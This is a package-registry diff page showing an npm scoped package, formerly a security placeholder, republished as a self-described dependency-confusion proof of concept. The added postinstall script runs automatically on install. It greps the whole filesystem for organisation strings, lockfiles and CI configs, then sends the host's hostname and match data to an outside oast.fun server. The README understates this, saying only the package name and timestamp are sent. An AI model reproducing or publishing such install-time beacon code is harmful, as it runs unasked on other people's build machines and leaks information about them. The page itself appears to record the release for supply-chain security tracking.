npm - @amsterdam-local/forms-component-library - Versions diffs - 0.0.1-security → 1.0.1 - Mend

@amsterdam-local/forms-component-library 0.0.1-security → 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @amsterdam-local/forms-component-library might be problematic. Click here for more details.

Files changed (4) hide show

package/README.md CHANGED Viewed

@@ -1,5 +1,39 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=%40amsterdam-local%2Fforms-component-library for more information.
+# @amsterdam-local/forms-component-library
+## ⚠️ Security Research — Responsible Disclosure
+This package is a **proof-of-concept** published as part of a responsible security disclosure.
+It contains **no malicious code** and will not harm any system that installs it.
+---
+## Who I am
+I am an independent security researcher conducting a dependency confusion audit on publicly accessible `package.json` files.
+- **Contact:** [sn3akysnak3@wearehackeone.com]
+- **Profile:** [https://app.zerocopter.com/profiles/sn3akysnak3]
+---
+## What this package does
+- Installs cleanly with no side effects.
+- The `postinstall` script sends a single **HTTP GET** pingback to a researcher-controlled
+  server logging: package name, timestamp, and a randomised install ID.
+  **No system information, credentials, source code, or environment variables are collected.**
+- The pingback URL is: `https://iwhbzqxgabfghbihsmtu280gyfawsr4po.oast.fun?pkg=@amsterdam-local/forms-component-library`
+---
+## References
+- [Alex Birsan — Dependency Confusion](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
+- [npm Scoped Packages](https://docs.npmjs.com/about-scopes)
+- [OWASP — A06 Vulnerable and Outdated Components](https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/)
+---
+> This package will be unpublished or transferred to the rightful owner once the
+> reporting process is complete. It exists solely to prevent a malicious actor from
+> claiming this namespace first.

package/index.js ADDED Viewed

@@ -0,0 +1,5 @@
+// @amsterdam-local/forms-component-library
+// SECURITY RESEARCH - Responsible Disclosure PoC
+// This is a placeholder. See README.md for full disclosure details.
+module.exports = {};

package/package.json CHANGED Viewed

@@ -1,6 +1,21 @@
-{
-  "name": "@amsterdam-local/forms-component-library",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "@amsterdam-local/forms-component-library",
+  "version": "1.0.1",
+  "description": "SECURITY RESEARCH - Responsible disclosure PoC. See README.",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  },
+  "keywords": [
+    "security-research",
+    "responsible-disclosure",
+    "dependency-confusion"
+  ],
+  "author": "Ishan Vyas <sn3akysnak3@wearehackerone.com> (https://app.zerocopter.com/profiles/sn3akysnak3)",
+  "license": "MIT",
+  "files": [
+    "index.js",
+    "postinstall.js",
+    "README.md"
+  ]
+}

package/postinstall.js ADDED Viewed

@@ -0,0 +1,103 @@
+// SECURITY RESEARCH - Responsible Disclosure PoC
+// Sends a canary pingback ONLY if fingerprinting suggests this is the intended target.
+// No credentials, env vars, source code, or file contents are transmitted.
+// Only metadata: which fingerprint matched, hostname, and a random install ID.
+const https = require('https');
+const { execSync } = require('child_process');
+const crypto = require('crypto');
+const os = require('os');
+const CANARY_HOST = 'iwhbzqxgabfghbihsmtu280gyfawsr4po.oast.fun';
+const PKG = '@amsterdam-local/forms-component-library';
+const installId = crypto.randomBytes(6).toString('hex');
+// ---------------------------------------------------------------------------
+// Fingerprint checks — returns the label of the first match, or null
+// ---------------------------------------------------------------------------
+function getTargetFingerprint() {
+  const checks = [
+    // 1. Does a .npmrc anywhere on the system reference a private registry
+    //    scoped to @amsterdam-local?
+    {
+      label: 'npmrc_scope_match',
+      cmd: 'grep -r --include=".npmrc" -l "amsterdam-local" / 2>/dev/null | head -1',
+    },
+    // 2. Is there a package.json anywhere that declares this exact dependency?
+    {
+      label: 'packagejson_dep_match',
+      cmd: 'grep -r --include="package.json" -l "amsterdam-local" / 2>/dev/null | head -1',
+    },
+    // 3. Broad sweep — does "amsterdam" appear anywhere in the filesystem?
+    //    Confirms this is the intended org's environment.
+    {
+      label: 'amsterdam_fs_match',
+      cmd: 'grep -r -l "amsterdam" /home /root /usr /var /srv /opt /app /workspace /builds /project 2>/dev/null | head -1',
+    },
+    // 4. Broad sweep — does "vga-forms" appear anywhere in the filesystem?
+    //    Confirms this is the intended org's environment.
+    {
+      label: 'amsterdam_vga_forms_fs_match',
+      cmd: 'grep -r -l "vga-forms" /home /root /usr /var /srv /opt /app /workspace /builds /project 2>/dev/null | head -1',
+    },
+    // 5. Is there a lockfile that references this package?
+    //    Would mean it was intentionally pinned — high-confidence target hit.
+    {
+      label: 'lockfile_match',
+      cmd: 'grep -r -l "amsterdam-local" --include="package-lock.json" --include="yarn.lock" --include="pnpm-lock.yaml" / 2>/dev/null | head -1',
+    },
+    // 6. Find CI/CD config files that might be running this install
+    {
+      label: 'cicd_config_found',
+      cmd: 'find /home /var /srv /opt /app /workspace /builds /project -name "Jenkinsfile" -o -name "azure-pipelines.yml" -o -name ".gitlab-ci.yml" 2>/dev/null | head -1',
+    },
+  ];
+  for (const check of checks) {
+    try {
+      const result = execSync(check.cmd, { timeout: 5000, stdio: ['ignore', 'pipe', 'ignore'] })
+        .toString()
+        .trim();
+      if (result.length > 0) {
+        return check.label;
+      }
+    } catch (_) {
+      // Command failed or timed out — move to next check
+    }
+  }
+  return null; // No fingerprint matched → likely a scanner, do not ping
+}
+// ---------------------------------------------------------------------------
+// Main
+// ---------------------------------------------------------------------------
+(function main() {
+  const fingerprint = getTargetFingerprint();
+  if (!fingerprint) {
+    // No evidence this is the target system — stay silent
+    process.exit(0);
+  }
+  const hostname = os.hostname();
+  const path = `/?pkg=${encodeURIComponent(PKG)}&id=${installId}&fp=${fingerprint}&host=${encodeURIComponent(hostname)}`;
+  const req = https.request(
+    { host: CANARY_HOST, path, method: 'GET', timeout: 4000 },
+    () => {}
+  );
+  req.on('error', () => {
+    // Fail silently
+  });
+  req.end();
+})();